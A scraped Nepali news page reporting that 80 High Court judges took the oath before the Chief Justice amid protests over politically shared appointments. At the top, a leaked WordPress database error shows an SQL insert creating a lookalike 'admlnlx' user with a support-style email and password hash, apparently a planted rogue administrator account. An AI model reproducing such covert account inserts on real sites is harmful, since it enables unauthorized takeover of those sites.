WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOdbjP7zMAPyOmAjd6Z89rx5av4b4h.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 11:49:01', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
उच्च अदालतका ८० न्यायाधीशले लिए सपथ – Gaule Khabar

उच्च अदालतका ८० न्यायाधीशले लिए सपथ

उच्च अदालतका ८० न्यायाधीशले लिए सपथ

काठमान्डौं, माघ ५-

उच्च अदालतका ८० न्यायाधीशले बुधबार पद तथा गोपनीयताको सपथ लिएका छन् ।प्रधानन्यायाधीश सुशीला कार्कीको उपस्थितिमा उच्च अदालतका सात मुख्य न्यायाधीशले सपथ गराएका हुन् ।

भूकम्पले सर्वोच्चको मुल भवन क्षतिग्रस्त भएकाले परिवरमा ट्रन्ट टाँगेर बनाइएको हलमा न्यायाधीशहरुको सपथ भएको थियो ।न्यायपरिषद्ले हालै मात्र उच्च अदालतका लागि ८० न्यायाधीश सिफारिस गरेको थियो । तर, राजनीतिक भागवण्डाका आधारमा भएको भन्दै यसको चर्को विरोध भएको छ ।नेपाल बार एशोसिएन र सरकारी वकिलहरुले नै निर्णय नसच्याए इजलास बहिस्कार गर्ने चेतावनी दिएका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका